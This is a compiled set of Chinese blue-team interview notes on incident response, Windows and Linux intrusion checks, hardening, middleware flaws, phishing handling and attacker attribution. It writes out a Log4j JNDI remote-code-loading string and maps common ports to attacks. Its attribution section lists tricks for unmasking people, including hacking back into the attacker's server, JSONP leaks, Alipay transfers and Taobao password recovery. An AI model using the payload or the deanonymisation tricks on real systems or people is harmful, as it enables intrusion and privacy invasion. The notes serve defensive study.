藍隊面試知識點整理

整理自網絡

1.應急響應基本思路流程

收集信息：收集客戶信息和中毒主機信息，包括樣本

判斷類型：判斷是否是安全事件，何種安全事件，勒索、挖礦、斷網、DoS 等等

抑制范圍：隔離使受害?不繼續擴?

深入分析：日志分析、進程分析、啟動項分析、樣本分析方便后期溯源

清理處置：殺掉進程，刪除文件，打補丁，刪除異常系統服務，清除后門賬號防止事件擴大，處理完畢后恢復生產

產出報告：整理并輸出完整的安全事件報告

2.Windows入侵排查思路

檢查系統賬號安全

1.1 查看服務器是否有弱口令，遠程管理端口是否對公網開放（使用netstat -ano 命令、或者問服務器管理員）

1.2 lusrmgr.msc命令查看服務器是否存在可疑賬號、新增賬號，如有管理員群組的（Administrators）里的新增賬戶，如有，立即禁用或刪除掉

1.3 用 D 盾或者注冊表中查看服務器是否存在隱藏賬號、克隆賬號
　　
在cmd中輸入：net user 看看有沒有陌生用戶
在cmd中輸入：regedit 找到注冊表分支 “HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/”看看有沒有克隆用戶
　　
1.4 結合日志，查看管理員登錄時間、用戶名是否存在異常

檢查方法：Win+R 打開運行，輸入“eventvwr.msc”，回車運行，打開“事件查看器”，導出 Windows 日志–安全，利用 Log Parser 進行分析
系統日志包含Windows系統組件記錄的事件。應用程序日志包含由應用程序或程序記錄的事件。安全日志包含諸如有效和無效的登錄嘗試等事件，以及與資源使用相關的事件，如創建、打開或刪除文件或其他對象。

檢查異常端口、進程

netstat -ano檢查端口連接情況，是否有遠程連接、可疑連接
在cmd命令行中輸入 netstat -ano 查看目前的網絡連接，定位可疑的pid。
根據定位出的pid，再通過tasklist命令進行進程定位 tasklist | findstr “PID”
發現的感覺異常的 IP 地址可以在威脅情報平臺上查詢，如果是已知的惡意 IP，可以比較快速的確認攻擊方式。

任務管理器-進程
進程查看工具：procexp.exe

檢查啟動項、計劃任務、服務

啟動項查看工具：autoruns.exe
計劃任務查看：按下win+r鍵打開運行，輸入taskschd.msc 打開任務計劃，查看有沒有可疑的計劃任務。

檢查系統相關信息

查看系統版本以及補丁信息
查找可疑目錄及文件

日志分析
如果數據庫被入侵，查看數據庫登錄日志等，如Sqlserver數據庫支持設置記錄用戶登錄成功 和失敗的日志信息。

3.Linux入侵排查思路

• 1 賬號安全

  who 查看當前登錄用戶（tty本地登陸 pts遠程登錄） w 查看系統信息，想知道某一時刻用戶的行為 uptime 查看登陸多久、多少用戶，負載 a) 用戶信息文件/etc/passwdroot:x:0:0:root:/root:/bin/bash account:password:UID:GID:GECOS:directory:shell 用戶名：密碼：用戶ID：組ID：用戶說明：家目錄：登陸之后shell 注意：無密碼只允許本機登陸，遠程不允許登陸b) 影子文件/etc/shadowroot:$6$oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7::: 用戶名：加密密碼：密碼最后一次修改日期：兩次密碼的修改時間間隔：密碼有效期：密碼修改到期到的警告天數：密碼過期之后的寬限天數：賬號失效時間：保留

  /etc/passwd 存儲一般的用戶信息，任何人都可以訪問；/etc/shadow 存儲用戶的密碼信息，只有 root 用戶可以訪問

• 2 歷史命令

  1、root的歷史命令 histroy 2、打開 /home 各帳號目錄下的 .bash_history，查看普通帳號的歷史命令歷史操作命令的清除：history -c 但此命令并不會清除保存在文件中的記錄，因此需要手動刪除.bash_history文件中的記錄

• 3 檢查異常端口

  netstat -antlp|morels -l /proc/$PID/XXX file /proc/$PID/XXX 查看pid所對應的進程文件信息

• 4 檢查異常進程

  ps aux | grep pid

• 5 檢查開機啟動項

  /etc/rc.local /etc/rc.d/rc[0~6].d

• 6 檢查定時任務

  crontab -l 列出某個用戶cron服務的詳細內容 Tips：默認編寫的crontab文件會保存在 (/var/spool/cron/用戶名 例如: /var/spool/cron/root crontab -r 刪除某個用戶cront任務 crontab -e 使用編輯器編輯當前的crontab文件

• 7 檢查服務

  chkconfig --list systemctl list-unit-files 查看系統運行的服務

• 8 檢查異常文件

• 9 檢查系統日志

• 10.其他常用命令
  系統信息

  • 查看當前系統狀態 top
  • 操作系統信息 uname -a
  • 查看當前系統進程信息 ps
  • 查看歷史命令 history
  • 列出本機所有的連接和監聽的端口 netstat
  • 查看誰在使用某個端口 lsof

  系統信息

  • 查看當前用戶登錄系統情況 who
  • 查看可登錄的賬戶 cat/etc/passwd|grep ‘/bin/bash’
  • 查看用戶錯誤的登錄信息 lastb
  • 查看所有用戶最后的登錄信息 lastlog
  • 查看用戶最近登錄信息 last
  • /var/log/ 其中，/var/log/wtmp 存儲登錄成功的信息、btmp存儲登錄失敗的信息、utmp存儲當前正在登錄的信息
  • 查看超級權限賬戶awk -F: '$3==0 {print $1}' /etc/passwd
  • 查看空口令賬戶 awk -F: 'length($2)==0 {print $1}' /etc/shadow

4.Linux基線規范

賬號管理和授權

• 檢查特殊賬號，是否存在空密碼的賬戶和 root 權限賬戶
• 禁用或刪除無用賬號
• 添加口令策略:/etc/login.defs修改配置文件，設置過期時間、連續認證失敗次數
• 禁止 root 遠程登錄，限制root用戶直接登錄。
• 檢查 su 權限。vi /etc/pam.d/su添加auth required pam_wheel.so group=test

服務

• 關閉不必要的服務
• SSH 服務安全
  • 不允許 root 賬號直接登錄系統，PermitRootLogin=no
  • 修改 SSH 使用的協議版本為 2
  • 修改允許密碼錯誤次數（默認 6 次），MaxAuthTries=3

文件系統

• 設置 umask 值 vi /etc/profile 添加行 umask 027
• 設置登錄超時 vi /etc/profile 修改配置文件，將以 TMOUT= 開頭的行注釋，設置為 TMOUT=180

日志

• 啟用 syslogd 日志，配置日志目錄權限，或者設置日志服務器

• 記錄所有用戶的登錄和操作日志，通過腳本代碼實現記錄所有用戶的登錄操作日志，防止出現安全事件后無據可查

IP 協議安全要求

• 遠程登錄取消 telnet 采用 ssh
• 設置 /etc/hosts.allow 和 deny
• 禁止 ICMP 重定向
• 禁止源路由轉發
• 防 ssh 破解，iptables (對已經建立的所有鏈接都放行，限制每分鐘連接 ssh 的次數)+ denyhost (添加 ip 拒絕訪問)

5.Apache 服務加固

https://www.alibabacloud.com/help/zh/security-advisories/latest/harden-apache-service-security

6.常用web中間件漏洞

https://www.freebuf.com/articles/web/192063.html

（一） IIS
1、PUT漏洞
2、短文件名猜解
3、遠程代碼執行
4、解析漏洞

（二） Apache
1、解析漏洞
2、目錄遍歷

（三） Nginx
1、文件解析
2、目錄遍歷
3、CRLF注入
4、目錄穿越

（四）Tomcat
1、遠程代碼執行
2、war后門文件部署

（五）jBoss
1、反序列化漏洞
2、war后門文件部署

（六）WebLogic
1、反序列化漏洞
2、SSRF
3、任意文件上傳
4、war后門文件部署

（七）其它中間件相關漏洞
1、FastCGI未授權訪問、任意命令執行
2、PHPCGI遠程代碼執行

7.護網的分組和流程？

護網的分組是在領導小組之下分為防護檢測組，綜合研判組，應急溯源組。流程大致分為備戰，臨戰，決戰三個階段

備戰階段，主要任務是進行兩方面的操作，一是減少攻擊面，即資產梳理，減少暴露面；二是排查風險點，即通過漏洞掃描，滲透測試，弱口令等進行自查

臨戰階段，主要任務也大致可以分為兩個部分，一是進行內部演練，發現疏忽處并進行相應整改；二是可以適當增加安全設備，比如WAF，IPS，IDS，SOC，堡壘機等

決戰階段，作為新人，主要就是堅守崗位，有應急日志就看自己能不能解決，不能就上報，服從上級安排，優化防護，持續整改

8.簡歷有護網經歷，你能談談護網的情況嗎

參加過護網藍隊，負責事件研判工作，主要使用 ips，ids 等設備做流量監控與日志分析工作判斷安全事件是否為誤判

對安全管理中心發出的態勢排查單進行排查，并將排查結果反饋給安全管理中心，對安全管理中心發出的封堵工單和解封工單進行對應的封堵與解封，每兩小時反饋一次排查結果、設備巡檢報告、封堵情況。查看呼池 DDOS 設備，記錄并排查告警信息

藍隊研判
研判工作要充分利用已有安全設備（需要提前了解客戶的網絡拓撲以及部署設備情況），分析其近期的設備告警，將全部流量日志（日志條件：源地址，目的地址，端口，事件名稱，時間，規則 ID，發生 次數等）根據研判標準進行篩選（像挖礦、蠕蟲、病毒、拒絕服務這類不太可能為攻擊方發起的攻擊的事件，直接過濾掉，減少告警數量），一般情況下，真實攻擊不可能只持續一次，它一定是長時間、周期性、多 IP 的進行攻擊

對于告警結合威脅情報庫如：微步、奇安信威脅情報中心、綠盟威脅情報云等對于流量日志的原 IP 地址進行分析，判斷其是否為惡意攻擊，推薦使用微步的插件，如果確認為攻擊行為或者不能確認是否為攻擊行為，進行下一步操作，在之前準備好的表格中查找 IP 是否為客戶內網部署的設備，如果不是，繼續進行下一步，在事件上報平臺查看是否有其他人提交過，如果沒有，則上報

然后根據流量日志，對請求數據包和返回數據包分析判斷其是否為誤報，需要留意 X-Forwarded-For（簡稱XFF）和 x-real-ip

可以了解些 webshell 工具的流量特征，尤其是免殺 webshell，有可能不會被設備識別

最后上報事件時，盡可能提供完整的截圖，包括源 ip、目的ip，請求包請求體，響應包響應體等重要信息，以方便后續人員研判溯源

9.一個大范圍影響的0day被曝光，作為甲方安全工程師，應該如何處理

• 首先是評估 0day 對自身系統的影響（這部分評估需要根據漏洞利用的利用點、是否需要交互、是否會影響系統的 CIA，是否有在野利用 poc，影響資產是否暴露在公網等很多因素決定，詳情可以參考 CVSS ）
• 如果確定有影響的話且有 poc，第一件事是先分析 poc 執行后會在什么地方留下痕跡，我們有什么樣的設備去采集這些痕跡所留下的數據，比如說 ntlm relay 這種，可以考慮從 Windows 事件日志當中 event_id 等于 4769 的事件入手編寫對應的規則，這樣的話可以利用 SIEM 或者實時日志分析平臺跑起來，可以建立起初步的感知防線，后期觸發告警，人肉運營也可以快速止損
• 日常建立完整的縱深防御體系，不要依賴于某一道防線

10.釣魚郵件處置

釣魚郵件發現
發現途徑如下：郵件系統異常登錄告警、員工上報、異常行為告警、郵件蜜餌告警

推薦接入微步或奇安信的情報數據。對郵件內容出現的 URL 做掃描，可以發現大量的異常鏈接
https://www.freebuf.com/articles/es/264037.html

處置

屏蔽辦公區域對釣魚郵件內容涉及站點、URL 訪問

• 根據辦公環境實際情況可以在上網行為管理、路由器、交換機上進行屏蔽

• 郵件內容涉及域名、IP 均都應該進行屏蔽

• 對訪問釣魚網站的內網 IP 進行記錄，以便后續排查溯源可能的后果

屏蔽釣魚郵件

• 屏蔽釣魚郵件來源郵箱域名

• 屏蔽釣魚郵件來源 IP

• 有條件的可以根據郵件內容進行屏蔽

• 刪除還在郵件服務器未被客戶端收取釣魚郵件

處理接收到釣魚郵件的用戶

• 根據釣魚郵件發件人進行日志回溯

  此處除了需要排查有多少人接收到釣魚郵件之外，還需要排查是否公司通訊錄泄露。采用 TOP500 姓氏撞庫發送釣魚郵件的攻擊方式相對后續防護較為簡單。如果發現是使用公司通訊錄順序則需要根據通訊錄的離職情況及新加入員工排查通訊錄泄露時間。畢竟有針對性的社工庫攻擊威力要比 TOP100、TOP500 大很多

• 通知已接收釣魚郵件的用戶進行處理

  刪除釣魚郵件

  系統改密

  全盤掃毒

后續：溯源、員工培訓提升安全意識

11.Log4j rce

log4j 是 java web 的日志組件，用來記錄 web 日志

原理：
以RMI為例，簡單闡述下該漏洞的攻擊原理：

1、攻擊者首先發布一個RMI服務，此服務將綁定一個引用類型的RMI對象。在引用對象中指定一個遠程的含有惡意代碼的類。

2、攻擊者再發布另一個惡意代碼下載服務，此服務可以下載所有含有惡意代碼的類。

3、攻擊者利用Log4j2的漏洞注入RMI調用，例如： log.info(“登錄成功”, “${jndi:rmi://rmi-service:1188/hackedclass}”);

4、調用RMI后將獲取到引用類型的RMI遠程對象，該對象將就加載惡意代碼并執行。

修復：升級 Log4j 到最新版本，根據業務判斷是否關閉 lookup

12.WAF產品如何來攔截攻擊？

Waf 產品有三種

云 Waf

用戶不需要在自己的網絡中安裝軟件程序或部署硬件設備，就可以對網站實施安全防護，它的主要實現方式是利用 DNS 技術，通過移交域名解析權來實現安全防護。用戶的請求首先發送到云端節點進行檢測，如存在異常請求則進行攔截否則將請求轉發至真實服務器

Web 防護軟件

安裝在需要防護的服務器上，實現方式通常是 Waf 監聽端口或以 Web 容器擴展方式進行請求檢測和阻斷

硬件 Web 防火墻

Waf 串行部署在 Web 服務器前端，用于檢測、阻斷異常流量。常規硬件 Waf 的實現方式是通過代理技術代理來自外部的流量

原理都相同，通過部署在 Web 服務器前方串行接入來將 Web 流量牽引到 WAF 設備中進行清洗或者攔截，最終只把正常用戶的請求轉發給服務器

當前市場上 Waf 產品核心的防護機制是“規則”，每一個請求、會話，經過抓包，“開包檢查”，每一項規則都會檢查到，一旦檢查不通過，就會被認為是非法訪問，拒絕處理

13.溯源

基本步驟

1.攻擊源捕獲

• 安全設備報警，如掃描IP、威脅阻斷、病毒木馬、入侵事件等
• 日志與流量分析，異常的通訊流量、攻擊源與攻擊目標等
• 服務器資源異常，異常的文件、賬號、進程、端口，啟動項、計劃任務和服務等
• 郵件釣魚，獲取惡意文件樣本、釣魚網站 URL 等
• 蜜罐系統，獲取攻擊者 ID、電腦信息、瀏覽器指紋、行為、意圖的相關信息

2.溯源反制手段

• IP 定位技術
  根據IP定位物理地址–代理 IP
  溯源案例：通過 IP 端口掃描，反向滲透服務器進行分析，最終定位到攻擊者相關信息
• ID 追蹤術
  ID 追蹤術，搜索引擎、社交平臺、技術論壇、社工庫匹配
  溯源案例：利用 ID 從技術論壇追溯郵箱，繼續通過郵箱反追蹤真實姓名，通過姓名找到相關簡歷信息
• 網站 url
  域名 Whois 查詢–注冊人姓名、地址、電話和郵箱 --域名隱私保護
  溯源案例：通過攻擊 IP 歷史解析記錄/域名，對域名注冊信息進行溯源分析
• 惡意樣本分析
  提取樣本特征、用戶名、ID、郵箱、C2 服務器等信息–同源分析
  溯源案例：樣本分析過程中，發現攻擊者的個人 ID 和 QQ，成功定位到攻擊者
• 社交賬號
  基于 JSONP 跨域，獲取攻擊者的主機信息、瀏覽器信息、真實 IP 及社交信息等
  利用條件：可以找到相關社交網站的 jsonp 接口泄露敏感信息，相關網站登錄未注銷

3.攻擊者畫像

• 攻擊路徑

攻擊目的：拿到權限、竊取數據、獲取利益、DDOS 等
網絡代理：代理 IP、跳板機、C2 服務器等
攻擊手法：魚叉式郵件釣魚、Web滲透、水坑攻擊、近源滲透、社會工程等

• 攻擊者身份畫像

虛擬身份：ID、昵稱、網名
真實身份：姓名、物理位置
聯系方式：手機號、qq/微信、郵箱
組織情況：單位名稱、職位信息

技巧

• 域名、ip 反查目標個人信息
• 支付寶轉賬，確定目標姓氏
• 淘寶找回密碼，確定目標名字
• 企業微信手機號查公司名稱
• REG007 查注冊應用、網站
• 程序 PDB 信息泄露

13. 如何識別安全設備中的無效告警

比如說：攻擊方通過對目標資產所處的C段進行批量掃描，但C段的資產并非都是處于「活躍」狀態，甚至根本沒有這個資產。而安全設備還是因為這個「攻擊嘗試行為」產生了告警，那么這種告警就屬于“無效告警”。

比如說：攻擊方嘗試利用現成的“EXP&POC集成腳本工具”對資產目標進行檢測掃描，安全設備檢測到“攻擊嘗試行為”中的攻擊特征就會產生告警。在通常情況下，可以把告警中的URL的“網頁狀態碼”、“頁面回顯數據”作為“誤報告警”判斷的條件之一。

14.常見的端口是哪些，是什么服務，對應的紅隊攻擊方式

數據庫類（掃描弱口令）

• 1433：MSSQL
• 1521：Oracle
• 3306：Mysql
• 5432：PostgreSQL

特殊服務類（未授權/命令執行）

• 443：ssl 心臟滴血
• 873：Rsync 未授權
• 5984：CouchDB http：//xxx:5984/_utils/
• 6379：Redis 未授權
• 7001、7002：Weblogic 默認弱口令
• 8088：Hadoop Yarn 資源管理系統 REST API 存在未授權
• 8161：Apache ActiveMQ 未授權、弱口令，put 文件上傳，move 文件移動
• 9200、9300：elasticsearch 命令執行
• 11211：Memcache 未授權，telnet ip 就可以獲得服務器敏感信息
• 27017、27018：Mongodb 未授權
• 50000：SAP 命令執行
• 50070、50030 Hadoop 未授權訪問

常用端口類（弱口令/端口爆破）

• 21：FTP 弱口令，匿名 anonymous/空登錄，以及 ms12-073
• 25：SMTP 簡單郵件傳輸服務器端口
• 23：Telnet 的端口，Telnet 是一種可以遠程登錄并管理遠程機器的服務
• 22：ssh 端口，PcAnywhere 建立 TCP 和這一端口的連接可能是為了尋找 ssh，這一服務有許多弱點
• 53：dns 端口
• 139：屬于 TCP 協議，是為 NetBIOS Session Service 提供的，主要提供 Windows 文件和打印機共享以及 Unix 中的 Samba 服務
• 445：網絡共享 smb 服務，嘗試利用 ms08067，ms17010 等以及 IPC$ 攻擊手段
• 2601、2604：zebra 路由，默認密碼 zebra

15.木馬駐留系統的方式有哪些？

a. 注冊表
b. 服務
c. 啟動目錄
d. 計劃任務
e. 關聯文件類型

總結

以上是生活随笔為你收集整理的蓝队面试知识点整理的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。